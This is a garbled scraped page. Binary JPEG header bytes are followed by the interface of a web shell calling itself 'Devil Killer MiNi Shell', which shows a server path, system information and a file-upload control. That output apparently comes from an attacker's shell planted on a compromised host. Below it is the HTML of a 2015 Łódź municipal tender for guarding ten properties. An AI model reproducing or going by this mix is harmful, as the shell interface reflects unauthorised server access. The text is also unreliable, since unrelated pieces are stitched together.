JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151211/183345-N-2015.html

<p class="kh_header"><b>Łódź: Przedmiotem zamówienia jest usługa stałej bezpośredniej ochrony fizycznej budynków i mienia obiektów w nieruchomościach administrowanych przez Zamawiającego</b><br>
<b>Numer ogłoszenia: 183345 - 2015; data zamieszczenia: 11.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Śródmieście , al. Tadeusza Kościuszki 47, 90-514 Łódź, woj. łódzkie, tel. 42 630 08 06, faks 42 630 08 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srodmiescie.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa stałej bezpośredniej ochrony fizycznej budynków i mienia obiektów w nieruchomościach administrowanych przez Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa stałej bezpośredniej ochrony fizycznej budynków i mienia obiektów w nieruchomościach administrowanych przez Zamawiającego, na warunkach określonych w projektach umów - załączniki nr 8 ÷ 8i Specyfikacji Istotnych Warunków Zamówienia  z podziałem na dziesięć części:
Część I  - ul. Kilińskiego 15  (nieruchomość mieszkalna po rewitalizacji w programie Miasto Kamienic),
Część II  - ul. Kilińskiego 84  (nieruchomość mieszkalna po rewitalizacji w programie Miasto Kamienic),
Część  III   - ul. Północna 1/3  (nieruchomość mieszkalna po rewitalizacji w programie Miasto kamienic), 
Część  IV  - ul. Piotrkowska 243 (nieruchomość mieszkalna po rewitalizacji w programie Miasto Kamienic), 
Część V   - ul. Zielona 6 (nieruchomość mieszkalna przeznaczona do rewitalizacji w programie Miasto Kamienic),
Część  VI  - ul. Ogrodowa 24 (nieruchomość mieszkalna przeznaczona do rewitalizacji w programie Miasto Kamienic),
Część  VII - al. T. Kościuszki 19/ Wólczańska 36  (nieruchomość użytkowa), 
Część  VIII - ul. Roosevelta 9  (nieruchomość użytkowa), 
Część   IX - ul. Sienkiewicza 75/77 (nieruchomość użytkowa), 
Część   X - ul. Tuwima  10  (nieruchomość użytkowa).
 Szczegółowy opis przedmiotu zamówienia zawarty jest w załącznikach nr 2 ÷ 2i  do SIWZ.
Zamawiający zaleca przeprowadzenie wizji lokalnej celem szczegółowego zapoznania się ze specyfiką i charakterem nieruchomości objętych zamówieniem. 
Zamawiający dopuszcza możliwość składania ofert częściowych - na całość lub dowolnie wybrane części zamówienia.
Zamawiający nie dopuszcza możliwości składania ofert wariantowych.                                                                                         Umowy mogą być zawarte: 
- część I ul. Kilińskiego 15  od 31.12.2015r. od godz. 07,30  do 29.02.2016 r. do godz. 07,30 lub do czasu zasiedlenia nieruchomości bądź zbycia przez Miasto Łódź,
- część II ul. Kilińskiego 84  od 31.12.2015r. od godz. 09,00  do 29.02.2016 r. do godz. 09,00 lub do czasu zasiedlenia nieruchomości bądź zbycia przez Miasto Łódź,
-  część III   ul. Północna 1/3  od 31.12.2015r. od godz 10,00 do 30.06.2016 r. do godz. 10,00  lub do czasu zasiedlenia nieruchomości bądź zbycia przez Miasto Łódź, 
-  część IV   ul. Piotrkowska 243  od 31.12.2015r. od godz 10,00 do 30.06.2016 r. do godz. 10,00  lub do czasu zasiedlenia nieruchomości bądź zbycia przez Miasto Łódź, 
-  część V   ul. Zielona 6  od 31.12.2015r. od godz 12,00 do 30.06.2016 r. do godz. 12,00  lub do czasu przekazania nieruchomości wykonawcy robót budowlanych, 
- część VI    ul. Ogrodowa 24   od 31.12.2015r. od godz. 07,00  do 30.06.2016 r. do godz. 07,00 lub do czasu wykwaterowania wszystkich najemców i przekazania całej nieruchomości do remontu wykonawcy robót budowlanych,
- część VII al. T. Kościuszki 19/Wólczańska 36  od 31.12.2015r. od godz. 12,00  do 31.12.2016 r. do godz. 12,00 lub do czasu zasiedlenia nieruchomości bądź zbycia przez Miasto Łódź,
- część VIII ul. Roosevelta 9  od 31.12.2015r. od godz. 14,00  do 31.12.2016 r. do godz. 14,00 lub do czasu zasiedlenia nieruchomości bądź zbycia przez Miasto Łódź,
- część IX ul. Sienkiewicza 75/77  od 31.12.2015r. od godz. 14,00  do 31.12.2016 r. do godz. 14,00 lub do czasu zasiedlenia nieruchomości bądź zbycia przez Miasto Łódź,
- część X ul. Tuwima 10  od 31.12.2015r. od godz. 14,00  do 31.12.2016 r. do godz. 14,00 lub do czasu zasiedlenia nieruchomości bądź zbycia przez Miasto Łódź.
 Maksymalna  ilość godzin  pracy  wynosi :
-  część  I  -  1440 godzin (60 dni x 24 godz. - 1 pracownik ochrony/ dozoru), 
-  części II  - 1440 godzin (60 dni x 24 godz. - 1 pracownik ochrony/ dozoru),
-  część III  - 4368 godzin (182 dni x 24 godz. - 1 pracownik ochrony/ dozoru),
-  część IV - 4368 godzin (182 dni x 24 godz. - 1 pracownik ochrony/ dozoru),
-  część V  - 4368 godzin (182 dni x 24 godz. - 1 pracownik ochrony/ dozoru),
- część VI  - 7476 godzin (182 dni  - 3 pracowników ochrony w obiekcie w tym:  2 pracowników kwalifikowanych od poniedziałku do piątku w godz. od 17:00 do 07:00 i we wszystkie soboty i niedziele przez 24 godz. na dobę wraz z poniedziałkiem do godz. 07:00, oraz 1 pracownika kwalifikowanego od poniedziałku do piątku w godz. od 07:00 do 17:00),
-  część VII   - 8784 godzin  (366 dni x 24 godz. - 1 pracownik ochrony/ dozoru),
-  część VIII  - 8784 godzin  (366 dni x 24 godz. - 1 pracownik ochrony/ dozoru),
-  część IX    - 8784 godzin  (366 dni x 24 godz. - 1 pracownik ochrony/ dozoru),
-  część X     - 8784 godzin  (366 dni x 24 godz. - 1 pracownik ochrony/ dozoru)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art 67 ust 1 pkt 6 ustawy Prawo zamówień publicznych stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zgodnie z zapisem art. 45 ust. 2 i 4 Ustawy Prawo zamówień publicznych Zamawiający wymaga wniesienia przez Wykonawcę wadium dla każdej części osobno tj.:
- dla części I   - w wysokości:     250,00 zł. 
- dla części  II  - w wysokości:    250,00 zł.
- dla części III  - w wysokości:    650,00 zł.
- dla części IV   - w wysokości:   650,00 zł. 
- dla części  V  - w wysokości:    650,00 zł.
- dla części VI  - w wysokości:   1500,00 zł.
- dla części VII   - w wysokości: 1000,00 zł. 
- dla części  VIII  - w wysokości: 1000,00 zł.
- dla części IX  - w wysokości:    1000,00 zł.
- dla części X   - w wysokości:    1000,00 zł. 
Wadium wnosi się przed upływem terminu składania ofert, przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.
 Wadium może być wniesione w jednej lub kilku następujących formach:
-  pieniądzu,
- poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).
Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Getin Bank SA 
nr rachunku 35 1560 0013 2376 1236 0000 0005, z dopiskiem na przelewie: Ochrona -  część nr ......... 
4. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
- pieniężnej dokument potwierdzający wniesienie wadium został załączony do oferty,
- innej niż pieniądz, oryginał dokumentu został złożony w oddzielnej kopercie, a jego kopia w ofercie.
 Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 ustawy Prawo zamówień publicznych.
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli przedstawi ważną na okres wykonywania zamówienia koncesję Ministra Spraw Wewnętrznych i Administracji wydaną na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r., Nr 145 poz. 1221 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek w sytuacji, kiedy wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje co najmniej 2 usługi odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia  obejmującej okres co najmniej 6 miesięcy, świadczonej w sposób ciągły o wartości łącznej brutto co najmniej 100.000,00 zł. dla jednej części zamówienia. 
W przypadku ubiegania się o realizację więcej niż jednej części zamówienia Wykonawca winien wykazać się wykonaniem usług ochrony mienia odpowiadającej sumie wymaganych usług dla tych części.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek w sytuacji, kiedy wykaże, że dysponuje niezbędnym sprzętem w który zostaną wyposażeni pracownicy ochrony  na każdą nieruchomość objętą zamówieniem,  tj. 
-	dla części I   - 4 telefony komórkowe,
-	dla części II  - 4 telefony komórkowe,
-	dla części III  - 4 telefony komórkowe,
-	dla części IV  - 4 telefony komórkowe,
-	dla części V  - 4 telefony komórkowe,
-	dla części VI - 6 telefonów komórkowych, środki przymusu bezpośredniego po 6 szt: gaz, paralizator, kajdanki, tonfa oraz oznakowany samochód służbowy - przez całą dobę na obiekcie.  
-	dla części VII  - 4 telefony komórkowe,
-	dla części VIII  - 4 telefony komórkowe,
-	dla części IX  - 4 telefony komórkowe,
-	dla części  X  - 4 telefony komórkowe,
W przypadku ubiegania się o realizację więcej niż jednej części zamówienia Wykonawca winien wykazać się dysponowaniem ilością sprzętu  wymaganych dla tych części.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać także, że dysponuje osobami, zdolnymi do wykonania zamówienia tj: 
- minimum 1 osobą -  (może być właściciel) wpisana na listę kwalifikowanych pracowników ochrony, upoważnioną przez Wykonawcę do kontaktów z Zamawiającym w trakcie realizacji zamówienia, odpowiedzialną za terminowe i prawidłowe wykonanie zamówienia ,oraz: 
-	dla części I  -  minimum  4 pracowników ochrony/dozoru, 
-	dla części II  - minimum 4 pracowników ochrony/dozoru,
-	dla części III  - minimum 4 pracowników ochrony/dozoru,
-	dla części IV - minimum 4 pracowników ochrony/dozoru,
-	dla części V - minimum 4 pracowników ochrony/dozoru,
-	dla części VI - minimum 6 pracowników ochrony wpisanych na listę kwalifikowanych pracowników ochrony fizycznej, o pełnej sprawności fizycznej i psychicznej bez orzeczonej niepełnosprawności częściowej lub całkowitej niezdolności do pracy.
Z uwagi na fakt, że teren obiektu przy ul. Ogrodowej 24 jest miejscem w którym często dochodzi do wybryków chuligańskich i prób popełnienia czynów przestępczych,  Zamawiający zaleca Wykonawcom przeprowadzenie wizji lokalnej terenu, oraz taki dobór pracowników ochrony aby posiadali odpowiednie predyspozycje do pracy w takim środowisku,
-	dla części VII  -  minimum  4 pracowników ochrony/dozoru, 
-	dla części VIII  - minimum 4 pracowników ochrony/dozoru,
-	dla części IX  - minimum 4 pracowników ochrony/dozoru,
-	dla części X  - minimum 4 pracowników ochrony/dozoru.
 W przypadku ubiegania się o realizację więcej niż jednej części Wykonawca winien wykazać się dysponowaniem ilością osób odpowiadającą sumie osób wymaganych dla tych części.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek w sytuacji, kiedy wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia tj. ochrony mienia na sumę ubezpieczenia w wysokości co najmniej  500 000,00 zł. przy składaniu oferty na jedną część zamówienia.
Jeżeli Wykonawca składa ofertę na więcej niż jedną część zamówienia to winien wykazać się wartością ubezpieczenia dla ilości części na które składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srodmiescie.azk.lodz.pl<br>
